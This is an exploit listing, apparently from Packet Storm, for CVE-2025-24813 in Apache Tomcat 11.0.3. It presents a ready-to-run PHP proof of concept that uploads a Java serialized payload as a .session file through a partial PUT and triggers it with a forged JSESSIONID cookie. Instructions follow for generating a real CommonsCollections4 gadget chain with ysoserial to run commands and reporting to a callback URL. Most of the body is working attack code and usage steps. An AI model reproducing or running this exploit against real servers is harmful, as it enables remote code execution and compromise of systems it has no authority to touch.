📄 Apache Tomcat 11.0.3 Remote Session Injection

🗓️ 26 Nov 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 237 Views

Tomcat 11.0.3 remote session injection via forged JSESSIONID and uploaded serialized payload (CVE-2025-24813).

Reporter	Title	Published	Views	Family All 321
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	3 Jul 202500:31	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	14 Mar 202507:36	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	14 Mar 202503:11	–	githubexploit
GithubExploit	Exploit for CVE-2025-55752	29 Oct 202508:27	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	11 May 202519:50	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	22 Mar 202515:16	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	12 Jul 202502:40	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	27 Apr 202513:50	–	githubexploit
GithubExploit	Exploit for CVE-2025-2783	26 May 202512:51	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Apache Tomcat	10 Dec 202509:53	–	githubexploit

=============================================================================================================================================
    | # Title     : Apache Tomcat 11.0.3 Remote Session Injection                                                                               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://tomcat.apache.org/                                                                                                  |
    =============================================================================================================================================
    
    [+] Summary : 
    
    A vulnerability allows attackers to upload a .session file containing a malicious Java serialized payload and then trigger it through a forged JSESSIONID cookie.
    
    [+] References : ( CVE-2025-24813 ) 
    
    1. Save the file as: poc.php
    
    2. Edit the target:
    ```php
    $target = "http://TARGET";
    
    3.Execute: php poc.php
    
    [+]  POC
    
    <?php
    /*
        CVE-2025-24813 – PHP Exploit 
        Author: Indoushka
        Packet Storm Security 
    */
    
    function rand_filename($length = 6) {
        $chars = 'abcdefghijklmnopqrstuvwxyz';
        $name = '';
        for ($i = 0; $i < $length; $i++) {
            $name .= $chars[random_int(0, strlen($chars)-1)];
        }
        return $name;
    }
    
    function generate_payload($interact_url) {
        // Java Serialized payload (replace with your custom gadget)
        return "\xac\xed\x00\x05\x73\x72\x00\x04\x44\x75\x6d\x6d\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x78\x70";
    
    }
    
    function exploit($target, $interact_url) {
    
        $filename = rand_filename();
        $put_url = $target . "/" . $filename . ".session";
        $get_url = $target . "/" . $filename;
    
        echo "[+] Exploit for CVE-2025-24813\n";
        echo "[+] By Indoushka\n\n";
        echo "[+] Uploading payload to: $put_url\n";
    
        $payload = generate_payload($interact_url);
    
        $headers = [
            "Content-Range: bytes 0-452/457",
            "Content-Type: application/octet-stream"
        ];
    
        $opts = [
            'http' => [
                'method' => "PUT",
                'header' => implode("\r\n", $headers),
                'content' => $payload,
                'ignore_errors' => true
            ]
        ];
    
        $context = stream_context_create($opts);
        $result = @file_get_contents($put_url, false, $context);
    
        preg_match('/HTTP\/\d\.\d\s+(\d+)/', $http_response_header[0], $m);
        $status = $m[1];
    
        if ($status == 201) {
            echo "[+] Payload uploaded successfully.\n";
        } else {
            echo "[-] Upload failed with status: $status\n";
            return;
        }
    
        echo "[+] Triggering payload via: $get_url\n";
    
        $opts2 = [
            'http' => [
                'method' => "GET",
                'header' => "Cookie: JSESSIONID=.$filename\r\n",
                'ignore_errors' => true
            ]
        ];
    
        $context2 = stream_context_create($opts2);
        @file_get_contents($get_url, false, $context2);
    
        echo "[+] Trigger request sent. Check your Interactsh callback: $interact_url\n";
    }
    
    // ====== Interactive Shell ======
    echo "[+] Exploit for CVE-2025-24813\n";
    echo "[+] Made By Indoushka\n\n";
    
    echo "Target URL: ";
    $target = trim(fgets(STDIN));
    
    echo "Interact URL: ";
    $interact = trim(fgets(STDIN));
    
    exploit($target, $interact);
    ?>
    
    
    
    ------------
    
    Generating a gadgets chain:
    
    Generate a Commons-Collections-4 payload to execute the command: whoami
    
    java -jar ysoserial.jar CommonsCollections4 "whoami" > payload.bin
    
    Convert it to hex or base64 for input into PHP : xxd -p payload.bin
    
    Place it where: return "<hex serialized bytes>";
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

26 Nov 2025 00:00Current

7High risk

Vulners AI Score7

CVSS 3.19.8 - 10

EPSS0.9413